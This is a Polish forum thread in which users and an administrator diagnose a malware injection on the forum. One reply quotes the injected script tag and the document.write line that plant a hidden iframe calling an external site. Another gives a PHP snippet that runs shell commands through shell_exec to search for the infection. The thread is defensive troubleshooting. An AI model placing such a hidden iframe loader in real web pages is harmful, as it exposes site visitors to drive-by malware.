co za syf na tym forum?

Czasem kazdy ma zly dzien...

Moderators: Creeping Death, Edi, chmiel

Post Reply
User avatar
popeye
Mam zdecydowanie za duzo czasu...
Mam zdecydowanie za duzo czasu...
Posts: 1391
Joined: 27 Jul 2004 02:43
Location: ja jestem?

co za syf na tym forum?

Post by popeye »

Czy wam też anty wirus pokazuje cały czas info o złośliwym oprogramowaniu?
Dbajmy by drzewa rosły jak najdłużej, bo kiedyś zrobią z nich dla Nas trumny

"Cichy potok - budzi się, Orzeł straż swą zaczyna
Taka cisza - taniec barw, Nad uśpioną doliną "

http://picasaweb.google.pl/darekab/
User avatar
chmiel
Moherator
Posts: 1289
Joined: 15 Mar 2004 15:28

Post by chmiel »

Mi nie.
Mam antywisrusa McAfee
...bo gdzie się ten kosmos kończy ?! Bo stół się, kurna, kończy tu !
pokrzewka
Bardzo zaaawansowany uzytkownik
Posts: 1557
Joined: 13 Sep 2005 18:57
Location: miasto sosen
Contact:

Post by pokrzewka »

w pracy mam kasperskiego, pisze, że zagrożenie i nie można wejść na stronę
może i wolno jeżdżę ale za to dokładnie
User avatar
behem0th
Ojciec Dyktator
Posts: 5310
Joined: 21 Feb 2004 13:50
Location: Ze wsi
Contact:

Post by behem0th »

a co pokazuje dokladnie?

nie wiem co tu zlosliwego moglo sie podlaczyc..
User avatar
behem0th
Ojciec Dyktator
Posts: 5310
Joined: 21 Feb 2004 13:50
Location: Ze wsi
Contact:

Post by behem0th »

fucktycznie cos sie dokleilo, usunelem, ale podobno wraca jak bumerang. ;)
dawac znak jak nie ok, ale najpierw wyczysccie cache.
User avatar
leoheart
Miły Gość
Posts: 3027
Joined: 09 Jan 2005 07:53
Location: Otwock
Contact:

Post by leoheart »

cały czas wyskakuje :twisted:

URL: http://otwock.org.pl//relacje/2002.korsy...
Proces: file://C:\Program Files\Mozilla Firefox\...
Infekcja: html:Iframe-inf
soldier of love
www.republika.pl/leoheart

Image
User avatar
behem0th
Ojciec Dyktator
Posts: 5310
Joined: 21 Feb 2004 13:50
Location: Ze wsi
Contact:

Post by behem0th »

a teraz? ;)
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Guest

Post by Guest »

behem0th wrote:a teraz? ;)
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Chyba wszedzie w forum z automatu dokleja to:

Code: Select all

tuz za <body> i </body>

script type="text/javascript" language="javascript" src="http://otwock.org.pl//relacje/2002.korsyka/arlesimages/jquery.ui.accordion.min.js" ></script 
ten psudo scrypt jquery generuje ten iframe:

Code: Select all

document.write('iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe');
Sciagnij wszystko na swoj komp i przeszukaj na ktorys z wystepujacych tu stringow (np "accordion") . Zrob dump bazy i tez przeszukaj
User avatar
chmiel
Moherator
Posts: 1289
Joined: 15 Mar 2004 15:28

Post by chmiel »

Hakier LUN4T1C0 atakuje !
...bo gdzie się ten kosmos kończy ?! Bo stół się, kurna, kończy tu !
Guest

Post by Guest »

Anonymous wrote:
behem0th wrote:a teraz? ;)
potrzebuje odnosniki do zarazonych plikow, nie wiem gdzie siedzi dokladnie
Albo zrób tak:

do pliku np szukaj_intruza.php wstaw kod:

Code: Select all

TAG PRE
<?php

$cmd = 'find . -type f -name "*.php" -exec grep -H -A2 -B2 "accordion" {} \;';
echo $cmd;
echo shell_exec($cmd);
i wywolaj go z przegladarki - byc moze zadziala - przeszukuje pliki php na string "accordion" Jesli chcesz przeszukac inne typy zamien -name "*.php" na np -name "*.tpl" itd albo usun wogole wtedy bedzie szukac wszystko

Na wyjsciu bedziesz mial nazwe pliku, nr linii i fragment kodu w kontekscie 2 linii przed i za znalezionym fragmentem
Guest

Post by Guest »

echo $cmd; mozna wywalic jest zbedne :)
User avatar
behem0th
Ojciec Dyktator
Posts: 5310
Joined: 21 Feb 2004 13:50
Location: Ze wsi
Contact:

Post by behem0th »

co za ch.. drugiego sajta tez przyatakowalo.

wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..

dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)
User avatar
Giant Mike
Mam zdecydowanie za duzo czasu...
Mam zdecydowanie za duzo czasu...
Posts: 898
Joined: 20 Apr 2005 19:41
Location: Warszał
Contact:

Post by Giant Mike »

behem0th wrote:co za ch.. drugiego sajta tez przyatakowalo.

wcina sie w .httaccess, pliki php i baze tyle ze jak to usune to znow zaraz sie pojawi pewnie..

dzieki za pomoc, pewnie bedzie potrzebna docelowo ;)
hmmmm ... a te pliki nie powinny być RO ?

Michał
Plannja Racing Team || GG#: 130876
User avatar
behem0th
Ojciec Dyktator
Posts: 5310
Joined: 21 Feb 2004 13:50
Location: Ze wsi
Contact:

Post by behem0th »

atrybuty sa ok, podobno trojan przechwytuje hasla i wchodzi jako wlasciciel, ostatnio mialem infekcje jakiegos syfu wiec by sie zgadzalo, jak tylko sobie przypmne i zmienie na nowe to bedzie dobrze. dorwalem logi, ftpa bedzie czystka :)
User avatar
behem0th
Ojciec Dyktator
Posts: 5310
Joined: 21 Feb 2004 13:50
Location: Ze wsi
Contact:

Post by behem0th »

powinno byc ok
Post Reply